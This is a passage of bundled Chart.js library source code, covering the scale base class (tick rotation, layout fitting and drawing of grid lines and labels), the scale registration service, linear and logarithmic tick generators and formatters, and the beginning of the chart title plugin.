// label settings
ticks: {
beginAtZero: false,
minRotation: 0,
maxRotation: 50,
mirror: false,
padding: 10,
reverse: false,
display: true,
autoSkip: true,
autoSkipPadding: 0,
labelOffset: 0,
// We pass through arrays to be rendered as multiline labels, we convert Others to strings here.
callback: Chart.Ticks.formatters.values
}
};
Chart.Scale = Chart.Element.extend({
// These methods are ordered by lifecycle. Utilities then follow.
// Any function defined here is inherited by all scale types.
// Any function can be extended by the scale type
beforeUpdate: function () {
helpers.callCallback(this.options.beforeUpdate, [this]);
},
update: function (maxWidth, maxHeight, margins) {
var me = this;
// Update Lifecycle - Probably don't want to ever extend or overwrite this function ;)
me.beforeUpdate();
// Absorb the master measurements
me.maxWidth = maxWidth;
me.maxHeight = maxHeight;
me.margins = helpers.extend({
left: 0,
right: 0,
top: 0,
bottom: 0
}, margins);
// Dimensions
me.beforeSetDimensions();
me.setDimensions();
me.afterSetDimensions();
// Data min/max
me.beforeDataLimits();
me.determineDataLimits();
me.afterDataLimits();
// Ticks
me.beforeBuildTicks();
me.buildTicks();
me.afterBuildTicks();
me.beforeTickToLabelConversion();
me.convertTicksToLabels();
me.afterTickToLabelConversion();
// Tick Rotation
me.beforeCalculateTickRotation();
me.calculateTickRotation();
me.afterCalculateTickRotation();
// Fit
me.beforeFit();
me.fit();
me.afterFit();
//
me.afterUpdate();
return me.minSize;
},
afterUpdate: function () {
helpers.callCallback(this.options.afterUpdate, [this]);
},
//
beforeSetDimensions: function () {
helpers.callCallback(this.options.beforeSetDimensions, [this]);
},
setDimensions: function () {
var me = this;
// Set the unconstrained dimension before label rotation
if (me.isHorizontal()) {
// Reset position before calculating rotation
me.width = me.maxWidth;
me.left = 0;
me.right = me.width;
} else {
me.height = me.maxHeight;
// Reset position before calculating rotation
me.top = 0;
me.bottom = me.height;
}
// Reset padding
me.paddingLeft = 0;
me.paddingTop = 0;
me.paddingRight = 0;
me.paddingBottom = 0;
},
afterSetDimensions: function () {
helpers.callCallback(this.options.afterSetDimensions, [this]);
},
// Data limits
beforeDataLimits: function () {
helpers.callCallback(this.options.beforeDataLimits, [this]);
},
determineDataLimits: helpers.noop,
afterDataLimits: function () {
helpers.callCallback(this.options.afterDataLimits, [this]);
},
//
beforeBuildTicks: function () {
helpers.callCallback(this.options.beforeBuildTicks, [this]);
},
buildTicks: helpers.noop,
afterBuildTicks: function () {
helpers.callCallback(this.options.afterBuildTicks, [this]);
},
beforeTickToLabelConversion: function () {
helpers.callCallback(this.options.beforeTickToLabelConversion, [this]);
},
convertTicksToLabels: function () {
var me = this;
// Convert ticks to strings
var tickOpts = me.options.ticks;
me.ticks = me.ticks.map(tickOpts.userCallback || tickOpts.callback);
},
afterTickToLabelConversion: function () {
helpers.callCallback(this.options.afterTickToLabelConversion, [this]);
},
//
beforeCalculateTickRotation: function () {
helpers.callCallback(this.options.beforeCalculateTickRotation, [this]);
},
calculateTickRotation: function () {
var me = this;
var context = me.ctx;
var globalDefaults = Chart.defaults.global;
var optionTicks = me.options.ticks;
// Get the width of each grid by calculating the difference
// between x offsets between 0 and 1.
var tickFontSize = helpers.getValueOrDefault(optionTicks.fontSize, globalDefaults.defaultFontSize);
var tickFontStyle = helpers.getValueOrDefault(optionTicks.fontStyle, globalDefaults.defaultFontStyle);
var tickFontFamily = helpers.getValueOrDefault(optionTicks.fontFamily, globalDefaults.defaultFontFamily);
var tickLabelFont = helpers.fontString(tickFontSize, tickFontStyle, tickFontFamily);
context.font = tickLabelFont;
var firstWidth = context.measureText(me.ticks[0]).width;
var lastWidth = context.measureText(me.ticks[me.ticks.length - 1]).width;
var firstRotated;
me.labelRotation = optionTicks.minRotation || 0;
me.paddingRight = 0;
me.paddingLeft = 0;
if (me.options.display) {
if (me.isHorizontal()) {
me.paddingRight = lastWidth / 2 + 3;
me.paddingLeft = firstWidth / 2 + 3;
if (!me.longestTextCache) {
me.longestTextCache = {};
}
var originalLabelWidth = helpers.longestText(context, tickLabelFont, me.ticks, me.longestTextCache);
var labelWidth = originalLabelWidth;
var cosRotation;
var sinRotation;
// Allow 3 pixels x2 padding either side for label readability
// only the index matters for a dataset scale, but we want a consistent interface between scales
var tickWidth = me.getPixelForTick(1) - me.getPixelForTick(0) - 6;
// Max label rotation can be set or default to 90 - also act as a loop counter
while (labelWidth > tickWidth && me.labelRotation < optionTicks.maxRotation) {
cosRotation = Math.cos(helpers.toRadians(me.labelRotation));
sinRotation = Math.sin(helpers.toRadians(me.labelRotation));
firstRotated = cosRotation * firstWidth;
// We're right aligning the text now.
if (firstRotated + tickFontSize / 2 > me.yLabelWidth) {
me.paddingLeft = firstRotated + tickFontSize / 2;
}
me.paddingRight = tickFontSize / 2;
if (sinRotation * originalLabelWidth > me.maxHeight) {
// go back one step
me.labelRotation--;
break;
}
me.labelRotation++;
labelWidth = cosRotation * originalLabelWidth;
}
}
}
if (me.margins) {
me.paddingLeft = Math.max(me.paddingLeft - me.margins.left, 0);
me.paddingRight = Math.max(me.paddingRight - me.margins.right, 0);
}
},
afterCalculateTickRotation: function () {
helpers.callCallback(this.options.afterCalculateTickRotation, [this]);
},
//
beforeFit: function () {
helpers.callCallback(this.options.beforeFit, [this]);
},
fit: function () {
var me = this;
// Reset
var minSize = me.minSize = {
width: 0,
height: 0
};
var opts = me.options;
var globalDefaults = Chart.defaults.global;
var tickOpts = opts.ticks;
var scaleLabelOpts = opts.scaleLabel;
var gridLineOpts = opts.gridLines;
var display = opts.display;
var isHorizontal = me.isHorizontal();
var tickFontSize = helpers.getValueOrDefault(tickOpts.fontSize, globalDefaults.defaultFontSize);
var tickFontStyle = helpers.getValueOrDefault(tickOpts.fontStyle, globalDefaults.defaultFontStyle);
var tickFontFamily = helpers.getValueOrDefault(tickOpts.fontFamily, globalDefaults.defaultFontFamily);
var tickLabelFont = helpers.fontString(tickFontSize, tickFontStyle, tickFontFamily);
var scaleLabelFontSize = helpers.getValueOrDefault(scaleLabelOpts.fontSize, globalDefaults.defaultFontSize);
var tickMarkLength = opts.gridLines.tickMarkLength;
// Width
if (isHorizontal) {
// subtract the margins to line up with the chartArea if we are a full width scale
minSize.width = me.isFullWidth() ? me.maxWidth - me.margins.left - me.margins.right : me.maxWidth;
} else {
minSize.width = display && gridLineOpts.drawTicks ? tickMarkLength : 0;
}
// height
if (isHorizontal) {
minSize.height = display && gridLineOpts.drawTicks ? tickMarkLength : 0;
} else {
minSize.height = me.maxHeight; // fill all the height
}
// Are we showing a title for the scale?
if (scaleLabelOpts.display && display) {
if (isHorizontal) {
minSize.height += (scaleLabelFontSize * 1.5);
} else {
minSize.width += (scaleLabelFontSize * 1.5);
}
}
if (tickOpts.display && display) {
// Don't bother fitting the ticks if we are not showing them
if (!me.longestTextCache) {
me.longestTextCache = {};
}
var largestTextWidth = helpers.longestText(me.ctx, tickLabelFont, me.ticks, me.longestTextCache);
var tallestLabelHeightInLines = helpers.numberOfLabelLines(me.ticks);
var lineSpace = tickFontSize * 0.5;
if (isHorizontal) {
// A horizontal axis is more constrained by the height.
me.longestLabelWidth = largestTextWidth;
// TODO - improve this calculation
var labelHeight = (Math.sin(helpers.toRadians(me.labelRotation)) * me.longestLabelWidth) + (tickFontSize * tallestLabelHeightInLines) + (lineSpace * tallestLabelHeightInLines);
minSize.height = Math.min(me.maxHeight, minSize.height + labelHeight);
me.ctx.font = tickLabelFont;
var firstLabelWidth = me.ctx.measureText(me.ticks[0]).width;
var lastLabelWidth = me.ctx.measureText(me.ticks[me.ticks.length - 1]).width;
// Ensure that our ticks are always inside the canvas. When rotated, ticks are right aligned which means that the right padding is dominated
// by the font height
var cosRotation = Math.cos(helpers.toRadians(me.labelRotation));
var sinRotation = Math.sin(helpers.toRadians(me.labelRotation));
me.paddingLeft = me.labelRotation !== 0 ? (cosRotation * firstLabelWidth) + 3 : firstLabelWidth / 2 + 3; // add 3 px to move away from canvas edges
me.paddingRight = me.labelRotation !== 0 ? (sinRotation * (tickFontSize / 2)) + 3 : lastLabelWidth / 2 + 3; // when rotated
} else {
// A vertical axis is more constrained by the width. Labels are the dominant factor here, so get that length first
var maxLabelWidth = me.maxWidth - minSize.width;
// Account for padding
var mirror = tickOpts.mirror;
if (!mirror) {
largestTextWidth += me.options.ticks.padding;
} else {
// If mirrored text is on the inside so don't expand
largestTextWidth = 0;
}
if (largestTextWidth < maxLabelWidth) {
// We don't need all the room
minSize.width += largestTextWidth;
} else {
// Expand to max size
minSize.width = me.maxWidth;
}
me.paddingTop = tickFontSize / 2;
me.paddingBottom = tickFontSize / 2;
}
}
if (me.margins) {
me.paddingLeft = Math.max(me.paddingLeft - me.margins.left, 0);
me.paddingTop = Math.max(me.paddingTop - me.margins.top, 0);
me.paddingRight = Math.max(me.paddingRight - me.margins.right, 0);
me.paddingBottom = Math.max(me.paddingBottom - me.margins.bottom, 0);
}
me.width = minSize.width;
me.height = minSize.height;
},
afterFit: function () {
helpers.callCallback(this.options.afterFit, [this]);
},
// Shared Methods
isHorizontal: function () {
return this.options.position === 'top' || this.options.position === 'bottom';
},
isFullWidth: function () {
return (this.options.fullWidth);
},
// Get the correct value. NaN bad inputs, If the value type is object get the x or y based on whether we are horizontal or not
getRightValue: function (rawValue) {
// Null and undefined values first
if (rawValue === null || typeof(rawValue) === 'undefined') {
return NaN;
}
// isNaN(object) returns true, so make sure NaN is checking for a number; Discard Infinite values
if (typeof(rawValue) === 'number' && !isFinite(rawValue)) {
return NaN;
}
// If it is in fact an object, dive in one more level
if (typeof(rawValue) === 'object') {
if ((rawValue instanceof Date) || (rawValue.isValid)) {
return rawValue;
}
return this.getRightValue(this.isHorizontal() ? rawValue.x : rawValue.y);
}
// Value is good, return it
return rawValue;
},
// Used to get the value to display in the tooltip for the data at the given index
// function getLabelForIndex(index, datasetIndex)
getLabelForIndex: helpers.noop,
// Used to get data value locations. Value can either be an index or a numerical value
getPixelForValue: helpers.noop,
// Used to get the data value from a given pixel. This is the inverse of getPixelForValue
getValueForPixel: helpers.noop,
// Used for tick location, should
getPixelForTick: function (index, includeOffset) {
var me = this;
if (me.isHorizontal()) {
var innerWidth = me.width - (me.paddingLeft + me.paddingRight);
var tickWidth = innerWidth / Math.max((me.ticks.length - ((me.options.gridLines.offsetGridLines) ? 0 : 1)), 1);
var pixel = (tickWidth * index) + me.paddingLeft;
if (includeOffset) {
pixel += tickWidth / 2;
}
var finalVal = me.left + Math.round(pixel);
finalVal += me.isFullWidth() ? me.margins.left : 0;
return finalVal;
}
var innerHeight = me.height - (me.paddingTop + me.paddingBottom);
return me.top + (index * (innerHeight / (me.ticks.length - 1)));
},
// Utility for getting the pixel location of a percentage of scale
getPixelForDecimal: function (decimal /* , includeOffset*/) {
var me = this;
if (me.isHorizontal()) {
var innerWidth = me.width - (me.paddingLeft + me.paddingRight);
var valueOffset = (innerWidth * decimal) + me.paddingLeft;
var finalVal = me.left + Math.round(valueOffset);
finalVal += me.isFullWidth() ? me.margins.left : 0;
return finalVal;
}
return me.top + (decimal * me.height);
},
getBasePixel: function () {
var me = this;
var min = me.min;
var max = me.max;
return me.getPixelForValue(
me.beginAtZero ? 0 :
min < 0 && max < 0 ? max :
min > 0 && max > 0 ? min :
0);
},
// Actually draw the scale on the canvas
// @param {rectangle} chartArea : the area of the chart to draw full grid lines on
draw: function (chartArea) {
var me = this;
var options = me.options;
if (!options.display) {
return;
}
var context = me.ctx;
var globalDefaults = Chart.defaults.global;
var optionTicks = options.ticks;
var gridLines = options.gridLines;
var scaleLabel = options.scaleLabel;
var isRotated = me.labelRotation !== 0;
var skipRatio;
var useAutoskipper = optionTicks.autoSkip;
var isHorizontal = me.isHorizontal();
// figure out the maximum number of gridlines to show
var maxTicks;
if (optionTicks.maxTicksLimit) {
maxTicks = optionTicks.maxTicksLimit;
}
var tickFontColor = helpers.getValueOrDefault(optionTicks.fontColor, globalDefaults.defaultFontColor);
var tickFontSize = helpers.getValueOrDefault(optionTicks.fontSize, globalDefaults.defaultFontSize);
var tickFontStyle = helpers.getValueOrDefault(optionTicks.fontStyle, globalDefaults.defaultFontStyle);
var tickFontFamily = helpers.getValueOrDefault(optionTicks.fontFamily, globalDefaults.defaultFontFamily);
var tickLabelFont = helpers.fontString(tickFontSize, tickFontStyle, tickFontFamily);
var tl = gridLines.tickMarkLength;
var borderDash = helpers.getValueOrDefault(gridLines.borderDash, globalDefaults.borderDash);
var borderDashOffset = helpers.getValueOrDefault(gridLines.borderDashOffset, globalDefaults.borderDashOffset);
var scaleLabelFontColor = helpers.getValueOrDefault(scaleLabel.fontColor, globalDefaults.defaultFontColor);
var scaleLabelFontSize = helpers.getValueOrDefault(scaleLabel.fontSize, globalDefaults.defaultFontSize);
var scaleLabelFontStyle = helpers.getValueOrDefault(scaleLabel.fontStyle, globalDefaults.defaultFontStyle);
var scaleLabelFontFamily = helpers.getValueOrDefault(scaleLabel.fontFamily, globalDefaults.defaultFontFamily);
var scaleLabelFont = helpers.fontString(scaleLabelFontSize, scaleLabelFontStyle, scaleLabelFontFamily);
var labelRotationRadians = helpers.toRadians(me.labelRotation);
var cosRotation = Math.cos(labelRotationRadians);
var longestRotatedLabel = me.longestLabelWidth * cosRotation;
// Make sure we draw text in the correct color and font
context.fillStyle = tickFontColor;
var itemsToDraw = [];
if (isHorizontal) {
skipRatio = false;
// Only calculate the skip ratio with the half width of longestRotateLabel if we got an actual rotation
// See #2584
if (isRotated) {
longestRotatedLabel /= 2;
}
if ((longestRotatedLabel + optionTicks.autoSkipPadding) * me.ticks.length > (me.width - (me.paddingLeft + me.paddingRight))) {
skipRatio = 1 + Math.floor(((longestRotatedLabel + optionTicks.autoSkipPadding) * me.ticks.length) / (me.width - (me.paddingLeft + me.paddingRight)));
}
// if they defined a max number of optionTicks,
// increase skipRatio until that number is met
if (maxTicks && me.ticks.length > maxTicks) {
while (!skipRatio || me.ticks.length / (skipRatio || 1) > maxTicks) {
if (!skipRatio) {
skipRatio = 1;
}
skipRatio += 1;
}
}
if (!useAutoskipper) {
skipRatio = false;
}
}
var xTickStart = options.position === 'right' ? me.left : me.right - tl;
var xTickEnd = options.position === 'right' ? me.left + tl : me.right;
var yTickStart = options.position === 'bottom' ? me.top : me.bottom - tl;
var yTickEnd = options.position === 'bottom' ? me.top + tl : me.bottom;
helpers.each(me.ticks, function (label, index) {
// If the callback returned a null or undefined value, do not draw this line
if (label === undefined || label === null) {
return;
}
var isLastTick = me.ticks.length === index + 1;
// Since we always show the last tick,we need may need to hide the last shown one before
var shouldSkip = (skipRatio > 1 && index % skipRatio > 0) || (index % skipRatio === 0 && index + skipRatio >= me.ticks.length);
if (shouldSkip && !isLastTick || (label === undefined || label === null)) {
return;
}
var lineWidth, lineColor;
if (index === (typeof me.zeroLineIndex !== 'undefined' ? me.zeroLineIndex : 0)) {
// Draw the first index specially
lineWidth = gridLines.zeroLineWidth;
lineColor = gridLines.zeroLineColor;
} else {
lineWidth = helpers.getValueAtIndexOrDefault(gridLines.lineWidth, index);
lineColor = helpers.getValueAtIndexOrDefault(gridLines.color, index);
}
// Common properties
var tx1, ty1, tx2, ty2, x1, y1, x2, y2, labelX, labelY;
var textAlign = 'middle';
var textBaseline = 'middle';
if (isHorizontal) {
if (!isRotated) {
textBaseline = options.position === 'top' ? 'bottom' : 'top';
}
textAlign = isRotated ? 'right' : 'center';
var xLineValue = me.getPixelForTick(index) + helpers.aliasPixel(lineWidth); // xvalues for grid lines
labelX = me.getPixelForTick(index, gridLines.offsetGridLines) + optionTicks.labelOffset; // x values for optionTicks (need to consider offsetLabel option)
labelY = (isRotated) ? me.top + 12 : options.position === 'top' ? me.bottom - tl : me.top + tl;
tx1 = tx2 = x1 = x2 = xLineValue;
ty1 = yTickStart;
ty2 = yTickEnd;
y1 = chartArea.top;
y2 = chartArea.bottom;
} else {
if (options.position === 'left') {
if (optionTicks.mirror) {
labelX = me.right + optionTicks.padding;
textAlign = 'left';
} else {
labelX = me.right - optionTicks.padding;
textAlign = 'right';
}
// right side
} else if (optionTicks.mirror) {
labelX = me.left - optionTicks.padding;
textAlign = 'right';
} else {
labelX = me.left + optionTicks.padding;
textAlign = 'left';
}
var yLineValue = me.getPixelForTick(index); // xvalues for grid lines
yLineValue += helpers.aliasPixel(lineWidth);
labelY = me.getPixelForTick(index, gridLines.offsetGridLines);
tx1 = xTickStart;
tx2 = xTickEnd;
x1 = chartArea.left;
x2 = chartArea.right;
ty1 = ty2 = y1 = y2 = yLineValue;
}
itemsToDraw.push({
tx1: tx1,
ty1: ty1,
tx2: tx2,
ty2: ty2,
x1: x1,
y1: y1,
x2: x2,
y2: y2,
labelX: labelX,
labelY: labelY,
glWidth: lineWidth,
glColor: lineColor,
glBorderDash: borderDash,
glBorderDashOffset: borderDashOffset,
rotation: -1 * labelRotationRadians,
label: label,
textBaseline: textBaseline,
textAlign: textAlign
});
});
// Draw all of the tick labels, tick marks, and grid lines at the correct places
helpers.each(itemsToDraw, function (itemToDraw) {
if (gridLines.display) {
context.save();
context.lineWidth = itemToDraw.glWidth;
context.strokeStyle = itemToDraw.glColor;
if (context.setLineDash) {
context.setLineDash(itemToDraw.glBorderDash);
context.lineDashOffset = itemToDraw.glBorderDashOffset;
}
context.beginPath();
if (gridLines.drawTicks) {
context.moveTo(itemToDraw.tx1, itemToDraw.ty1);
context.lineTo(itemToDraw.tx2, itemToDraw.ty2);
}
if (gridLines.drawOnChartArea) {
context.moveTo(itemToDraw.x1, itemToDraw.y1);
context.lineTo(itemToDraw.x2, itemToDraw.y2);
}
context.stroke();
context.restore();
}
if (optionTicks.display) {
context.save();
context.translate(itemToDraw.labelX, itemToDraw.labelY);
context.rotate(itemToDraw.rotation);
context.font = tickLabelFont;
context.textBaseline = itemToDraw.textBaseline;
context.textAlign = itemToDraw.textAlign;
var label = itemToDraw.label;
if (helpers.isArray(label)) {
for (var i = 0, y = -(label.length - 1) * tickFontSize * 0.75; i < label.length; ++i) {
// We just make sure the multiline element is a string here..
context.fillText('' + label[i], 0, y);
// apply same lineSpacing as calculated @ L#320
y += (tickFontSize * 1.5);
}
} else {
context.fillText(label, 0, 0);
}
context.restore();
}
});
if (scaleLabel.display) {
// Draw the scale label
var scaleLabelX;
var scaleLabelY;
var rotation = 0;
if (isHorizontal) {
scaleLabelX = me.left + ((me.right - me.left) / 2); // midpoint of the width
scaleLabelY = options.position === 'bottom' ? me.bottom - (scaleLabelFontSize / 2) : me.top + (scaleLabelFontSize / 2);
} else {
var isLeft = options.position === 'left';
scaleLabelX = isLeft ? me.left + (scaleLabelFontSize / 2) : me.right - (scaleLabelFontSize / 2);
scaleLabelY = me.top + ((me.bottom - me.top) / 2);
rotation = isLeft ? -0.5 * Math.PI : 0.5 * Math.PI;
}
context.save();
context.translate(scaleLabelX, scaleLabelY);
context.rotate(rotation);
context.textAlign = 'center';
context.textBaseline = 'middle';
context.fillStyle = scaleLabelFontColor; // render in correct colour
context.font = scaleLabelFont;
context.fillText(scaleLabel.labelString, 0, 0);
context.restore();
}
if (gridLines.drawBorder) {
// Draw the line at the edge of the axis
context.lineWidth = helpers.getValueAtIndexOrDefault(gridLines.lineWidth, 0);
context.strokeStyle = helpers.getValueAtIndexOrDefault(gridLines.color, 0);
var x1 = me.left,
x2 = me.right,
y1 = me.top,
y2 = me.bottom;
var aliasPixel = helpers.aliasPixel(context.lineWidth);
if (isHorizontal) {
y1 = y2 = options.position === 'top' ? me.bottom : me.top;
y1 += aliasPixel;
y2 += aliasPixel;
} else {
x1 = x2 = options.position === 'left' ? me.right : me.left;
x1 += aliasPixel;
x2 += aliasPixel;
}
context.beginPath();
context.moveTo(x1, y1);
context.lineTo(x2, y2);
context.stroke();
}
}
});
};
}, {}], 33: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
Chart.scaleService = {
// Scale registration object. Extensions can register new scale types (such as log or DB scales) and then
// use the new chart options to grab the correct scale
constructors: {},
// Use a registration function so that we can move to an ES6 map when we no longer need to support
// old browsers
// Scale config defaults
defaults: {},
registerScaleType: function (type, scaleConstructor, defaults) {
this.constructors[type] = scaleConstructor;
this.defaults[type] = helpers.clone(defaults);
},
getScaleConstructor: function (type) {
return this.constructors.hasOwnProperty(type) ? this.constructors[type] : undefined;
},
getScaleDefaults: function (type) {
// Return the scale defaults merged with the global settings so that we always use the latest ones
return this.defaults.hasOwnProperty(type) ? helpers.scaleMerge(Chart.defaults.scale, this.defaults[type]) : {};
},
updateScaleDefaults: function (type, additions) {
var defaults = this.defaults;
if (defaults.hasOwnProperty(type)) {
defaults[type] = helpers.extend(defaults[type], additions);
}
},
addScalesToLayout: function (chartInstance) {
// Adds each scale to the chart.boxes array to be sized accordingly
helpers.each(chartInstance.scales, function (scale) {
Chart.layoutService.addBox(chartInstance, scale);
});
}
};
};
}, {}], 34: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
/**
* Namespace to hold static tick generation functions
* @namespace Chart.Ticks
*/
Chart.Ticks = {
/**
* Namespace to hold generators for different types of ticks
* @namespace Chart.Ticks.generators
*/
generators: {
/**
* Interface for the options provided to the numeric tick generator
* @interface INumericTickGenerationOptions
*/
/**
* The maximum number of ticks to display
* @name INumericTickGenerationOptions#maxTicks
* @type Number
*/
/**
* The distance between each tick.
* @name INumericTickGenerationOptions#stepSize
* @type Number
* @optional
*/
/**
* Forced minimum for the ticks. If not specified, the minimum of the data range is used to calculate the tick minimum
* @name INumericTickGenerationOptions#min
* @type Number
* @optional
*/
/**
* The maximum value of the ticks. If not specified, the maximum of the data range is used to calculate the tick maximum
* @name INumericTickGenerationOptions#max
* @type Number
* @optional
*/
/**
* Generate a set of linear ticks
* @method Chart.Ticks.generators.linear
* @param generationOptions {INumericTickGenerationOptions} the options used to generate the ticks
* @param dataRange {IRange} the range of the data
* @returns {Array<Number>} array of tick values
*/
linear: function (generationOptions, dataRange) {
var ticks = [];
// To get a "nice" value for the tick spacing, we will use the appropriately named
// "nice number" algorithm. See http://stackoverflow.com/questions/8506881/nice-label-algorithm-for-charts-with-minimum-ticks
// for details.
var spacing;
if (generationOptions.stepSize && generationOptions.stepSize > 0) {
spacing = generationOptions.stepSize;
} else {
var niceRange = helpers.niceNum(dataRange.max - dataRange.min, false);
spacing = helpers.niceNum(niceRange / (generationOptions.maxTicks - 1), true);
}
var niceMin = Math.floor(dataRange.min / spacing) * spacing;
var niceMax = Math.ceil(dataRange.max / spacing) * spacing;
// If min, max and stepSize is set and they make an evenly spaced scale use it.
if (generationOptions.min && generationOptions.max && generationOptions.stepSize) {
var minMaxDeltaDivisibleByStepSize = ((generationOptions.max - generationOptions.min) % generationOptions.stepSize) === 0;
if (minMaxDeltaDivisibleByStepSize) {
niceMin = generationOptions.min;
niceMax = generationOptions.max;
}
}
var numSpaces = (niceMax - niceMin) / spacing;
// If very close to our rounded value, use it.
if (helpers.almostEquals(numSpaces, Math.round(numSpaces), spacing / 1000)) {
numSpaces = Math.round(numSpaces);
} else {
numSpaces = Math.ceil(numSpaces);
}
// Put the values into the ticks array
ticks.push(generationOptions.min !== undefined ? generationOptions.min : niceMin);
for (var j = 1; j < numSpaces; ++j) {
ticks.push(niceMin + (j * spacing));
}
ticks.push(generationOptions.max !== undefined ? generationOptions.max : niceMax);
return ticks;
},
/**
* Generate a set of logarithmic ticks
* @method Chart.Ticks.generators.logarithmic
* @param generationOptions {INumericTickGenerationOptions} the options used to generate the ticks
* @param dataRange {IRange} the range of the data
* @returns {Array<Number>} array of tick values
*/
logarithmic: function (generationOptions, dataRange) {
var ticks = [];
var getValueOrDefault = helpers.getValueOrDefault;
// Figure out what the max number of ticks we can support it is based on the size of
// the axis area. For now, we say that the minimum tick spacing in pixels must be 50
// We also limit the maximum number of ticks to 11 which gives a nice 10 squares on
// the graph
var tickVal = getValueOrDefault(generationOptions.min, Math.pow(10, Math.floor(helpers.log10(dataRange.min))));
while (tickVal < dataRange.max) {
ticks.push(tickVal);
var exp;
var significand;
if (tickVal === 0) {
exp = Math.floor(helpers.log10(dataRange.minNotZero));
significand = Math.round(dataRange.minNotZero / Math.pow(10, exp));
} else {
exp = Math.floor(helpers.log10(tickVal));
significand = Math.floor(tickVal / Math.pow(10, exp)) + 1;
}
if (significand === 10) {
significand = 1;
++exp;
}
tickVal = significand * Math.pow(10, exp);
}
var lastTick = getValueOrDefault(generationOptions.max, tickVal);
ticks.push(lastTick);
return ticks;
}
},
/**
* Namespace to hold formatters for different types of ticks
* @namespace Chart.Ticks.formatters
*/
formatters: {
/**
* Formatter for value labels
* @method Chart.Ticks.formatters.values
* @param value the value to display
* @return {String|Array} the label to display
*/
values: function (value) {
return helpers.isArray(value) ? value : '' + value;
},
/**
* Formatter for linear numeric ticks
* @method Chart.Ticks.formatters.linear
* @param tickValue {Number} the value to be formatted
* @param index {Number} the position of the tickValue parameter in the ticks array
* @param ticks {Array<Number>} the list of ticks being converted
* @return {String} string representation of the tickValue parameter
*/
linear: function (tickValue, index, ticks) {
// If we have lots of ticks, don't use the ones
var delta = ticks.length > 3 ? ticks[2] - ticks[1] : ticks[1] - ticks[0];
// If we have a number like 2.5 as the delta, figure out how many decimal places we need
if (Math.abs(delta) > 1) {
if (tickValue !== Math.floor(tickValue)) {
// not an integer
delta = tickValue - Math.floor(tickValue);
}
}
var logDelta = helpers.log10(Math.abs(delta));
var tickString = '';
if (tickValue !== 0) {
var numDecimal = -1 * Math.floor(logDelta);
numDecimal = Math.max(Math.min(numDecimal, 20), 0); // toFixed has a max of 20 decimal places
tickString = tickValue.toFixed(numDecimal);
} else {
tickString = '0'; // never show decimal places for 0
}
return tickString;
},
logarithmic: function (tickValue, index, ticks) {
var remain = tickValue / (Math.pow(10, Math.floor(helpers.log10(tickValue))));
if (tickValue === 0) {
return '0';
} else if (remain === 1 || remain === 2 || remain === 5 || index === 0 || index === ticks.length - 1) {
return tickValue.toExponential();
}
return '';
}
}
};
};
}, {}], 35: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
Chart.defaults.global.title = {
display: false,
position: 'top',
fullWidth: true, // marks that this box should take the full width of the canvas (pushing down other boxes)
fontStyle: 'bold',
padding: 10,
// actual title
text: ''
};
var noop = helpers.noop;
Chart.Title = Chart.Element.extend({
initialize: function (config) {
var me = this;
helpers.extend(me, config);
me.options = helpers.configMerge(Chart.defaults.global.title, config.options);
// Contains hit boxes for each dataset (in dataset order)
me.legendHitBoxes = [];
},
// These methods are ordered by lifecycle. Utilities then follow.
beforeUpdate: function () {
var chartOpts = this.chart.options;
if (chartOpts && chartOpts.title) {
this.options = helpers.configMerge(Chart.defaults.global.title, chartOpts.title);
}
},
update: function (maxWidth, maxHeight, margins) {
var me = this;
// Update Lifecycle - Probably don't want to ever extend or overwrite this function ;)
me.beforeUpdate();
// Absorb the master measurements
me.maxWidth = maxWidth;
me.maxHeight = maxHeight;
me.margins = margins;
// Dimensions
me.beforeSetDimensions();
me.setDimensions();
me.afterSetDimensions();
// Labels
me.beforeBuildLabels();
me.buildLabels();
me.afterBuildLabels();
// Fit
me.beforeFit();
me.fit();
me.afterFit();
//
me.afterUpdate();
return me.minSize;
},
afterUpdate: noop,
//
beforeSetDimensions: noop,
setDimensions: function () {
var me = this;
// Set the unconstrained dimension before label rotation
if (me.isHorizontal()) {
// Reset position before calculating rotation
me.width = me.maxWidth;
me.left = 0;
me.right = me.width;
} else {
me.height = me.maxHeight;
// Reset position before calculating rotation
me.top = 0;
me.bottom = me.height;
}
// Reset padding
me.paddingLeft = 0;
me.paddingTop = 0;
me.paddingRight = 0;
me.paddingBottom = 0;
// Reset minSize
me.minSize = {
width: 0,
height: 0
};
},
afterSetDimensions: noop,
//
beforeBuildLabels: noop,
buildLabels: noop,
afterBuildLabels: noop,
//
beforeFit: noop,
fit: function () {
var me = this,
valueOrDefault = helpers.getValueOrDefault,
opts = me.options,
globalDefaults = Chart.defaults.global,
display = opts.display,
fontSize = valueOrDefault(opts.fontSize, globalDefaults.defaultFontSize),
minSize = me.minSize;
if (me.isHorizontal()) {
minSize.width = me.maxWidth; // fill all the width
minSize.height = display ? fontSize + (opts.padding * 2) : 0;
} else {
minSize.width = display ? fontSize + (opts.padding * 2) : 0;
minSize.height = me.maxHeight; // fill all the height
}
me.width = minSize.width;
me.height = minSize.height;
},
afterFit: noop,
// Shared Methods
isHorizontal: function () {
var pos = this.options.position;
return pos === 'top' || pos === 'bottom';
},
// Actually draw the title block on the canvas
draw: function () {
var me = this,
ctx = me.ctx,
valueOrDefault = helpers.getValueOrDefault,
opts = me.options,
globalDefaults = Chart.defaults.global;
if (opts.display) {
var fontSize = valueOrDefault(opts.fontSize, globalDefaults.defaultFontSize),
fontStyle = valueOrDefault(opts.fontStyle, globalDefaults.defaultFontStyle),
fontFamily = valueOrDefault(opts.fontFamily, globalDefaults.defaultFontFamily),
titleFont = helpers.fontString(fontSize, fontStyle, fontFamily),
rotation = 0,
titleX,
titleY,
top = me.top,
left = me.left,
bottom = me.bottom,
right = me.right,
maxWidth;
ctx.fillStyle = valueOrDefault(opts.fontColor, globalDefaults.defaultFontColor); // render in correct colour
ctx.font = titleFont;
// Horizontal
if (me.isHorizontal()) {
titleX = left + ((right - left) / 2); // midpoint of the width
titleY = top + ((bottom - top) / 2); // midpoint of the height
maxWidth = right - left;
} else {
titleX = opts.position === 'left' ? left + (fontSize / 2) : right - (fontSize / 2);
titleY = top + ((bottom - top) / 2);
maxWidth = bottom - top;
rotation = Math.PI * (opts.position === 'left' ? -0.5 : 0.5);
}
ctx.save();
ctx.translate(titleX, titleY);
ctx.rotate(rotation);
ctx.textAlign = 'center';
ctx.textBaseline = 'middle';
ctx.fillText(opts.text, 0, 0, maxWidth);
ctx.restore();
}
}
});
// Register the title plugin
